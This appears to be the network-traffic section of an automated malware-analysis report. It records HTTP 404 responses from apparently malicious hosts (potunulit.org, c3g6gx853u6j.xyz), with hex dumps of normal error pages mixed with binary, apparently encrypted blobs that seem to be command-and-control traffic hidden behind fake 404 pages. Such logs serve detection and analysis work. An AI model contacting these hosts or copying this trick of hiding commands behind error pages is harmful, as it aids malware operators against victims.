    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FOpB559DzjHCWc8RUj2AuzvkjlHz01Lj62UqeAPUd6KL8qhjv6KfurzST96PmUyYWy2mbEXZxERTx7Ym0b0W6vvD13r433w5GwbDEvKs4piUMZr%2BfQCsHdr6l3YM9m9K"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef0402cd03a6c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 39 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 08 94 14 c3 4d 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 2a 89 40 2c 0d 0a Data Ascii: 29Uys/~(`:Mf&["j*@,
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5dSDjD6S3oa6wjooA%2Fx6mItBwmaxGK9WT94%2BNmmbqUj1%2FhtdiLAqUtAqk0yNRC7e3dmfIkpgkw0%2BDA4usPf1e9jPazsr6ZLZ3xqSXZeDObGoqsd0y04FHdVBVjwBljJG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef051ba22381f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eBWzm8rLuw5Z2Rv%2BdciCWPAlC2gTM0qp2BXLdA3GOLbk5eXL%2BUUHolH1GI5jH6pbLc7PNuYzXf7af1MLoTnrKg6NO%2FphWIZ88PRQTh%2B5nTNcfpKfcmEP03S8qaeGtZjj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef0534cac381f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 35 62 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db a0 02 58 c2 3f 14 31 6e 6f ef fd b2 fc 33 3e a4 72 9d 1f 5a c2 de 37 cb fe 11 bc 90 0c 35 fe fa 25 df 88 57 24 51 89 c0 ab 2b f1 11 0e 57 33 4c 19 be b2 26 5d 3b e5 01 ca c7 10 b7 85 dd 8e 3a 11 cf 6b 88 cd 4b 98 4f dc cf 96 b8 6e 1f 1d bf 6c 13 d9 53 19 5e 87 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 57 2b 29 7b c8 1a 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 68 4e c5 03 11 d7 a1 61 7e de f5 a2 3f 19 17 7e 4f af 9a a5 34 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 81 de 4a 9a 07 fd ec 91 6d 70 ac 85 2f bd e1 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 9d ca cd 4f 07 79 82 ae 9c 37 1f 4c 35 24 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 5a 4f ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 bf 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 59 d0 b6 1b 6f d3 cb 29 32 48 e6 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 2f ee 03 e4 a6 0d 11 9f 10 9f d0 b0 99 63 98 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 f1 a2 9a 2b a9 b4 bb 04 7a 17 28 d2 2e 5b 1f d0 a3 aa 7a 8f 7c 61 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 a0 86 63 50 af 84 7e 4d a2 70 d4 03 7b b1 98 76 6a 0f ca 82 43 2f 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 83 b2 27 70 10 7b 3a 1d f8 00 d8 ae 88 c1 64 bc 33 25 09 da a9 c3 78 c2 2f Data Ascii: 15bf`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*X?1no3>rZ75%W$Q+W3L&];:kKOnlS^3Ob>!Z:V?#BSSQW+){~ExU$$hNa~?~O4zN.%Qa?|(HkJ
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TnehbfBqIv7LsCVSZyaL2htgllW83SjSroCvgpMfPnpwTGdPyrFGjzcLiZc%2FKWuMtA9TpRPRxT%2BUryF7XU6vn6YwABYEGR4aQLIEOU2cXDJd5krljzSX0WKyzSRHcSj8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef0596e17381f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:32 GMTServer: Apache/2.4.41 (Ubuntu)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 37 34 66 65 0d 0a 2f 00 00 00 8f 3b 47 32 46 2c cf 62 b4 69 4c 7a ea be ee 06 5f 4c ee 8e a8 e1 af 06 13 a0 cc 71 e9 ea 11 2f 96 e3 88 cb 32 b7 9a 95 e1 3c f7 13 c7 f8 58 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84 ff e6 9b 97 bb 1d 2c 7e fc 66 96 1e 85 41 67 5c 41 d7 d5 63 7c 55 a6 73 68 f1 7b 06 63
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:34 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:35 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:35 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 43Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb b8 4c 03 40 bb d7 f6 a7 e5 4e 07 ed 81 73 bb a9 49 75 c0 b9 d5 a7 72 f0 85 88 b9 Data Ascii: %S`Nh&WQL@NsIur
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:41 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 70Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba ff 0b 3d 94 e4 80 f5 33 bf 84 91 a5 22 ac 5a 8a a0 11 33 cd 72 46 c1 46 67 b9 cf 88 47 d7 ab 1d c5 c5 98 aa 3e b0 0e Data Ascii: %S`Nh&WQY^&=3"Z3rFFgG>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:43 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:44 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:45 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 37Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e f8 8b b7 e7 a2 0f 5b b0 9e 2a e1 b5 15 2a b8 c4 b2 Data Ascii: %S`Nh&WQY^[**
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:47 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 34Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e9 8a ac bb ba 03 06 ef e2 2a cf a8 4e 62 Data Ascii: %S`Nh&WQY^*Nb
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:48 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 83Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e9 8a ac f7 a3 19 42 b9 c4 65 fa e8 1a 75 85 e5 8a f8 20 b0 84 82 b9 7a ee 42 9c a0 0a 7d 90 77 5e 99 45 6a bf c0 c3 01 cc e7 48 80 9d ca ef 3a a4 00 39 fd d2 f4 fc e4 c2 32 ad 03 db 69 ec Data Ascii: %S`Nh&WQY^Beu zB}w^EjH:92i
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:05:50 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 55Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ea 87 ab b8 b9 0a 5d b5 dd 22 ef fb 09 33 9e e4 cb fb 27 f3 8d 95 a8 6c ef 54 9b ad 46 7d cf 63 1e cd 04 Data Ascii: %S`Nh&WQY^]"3'lTF}c
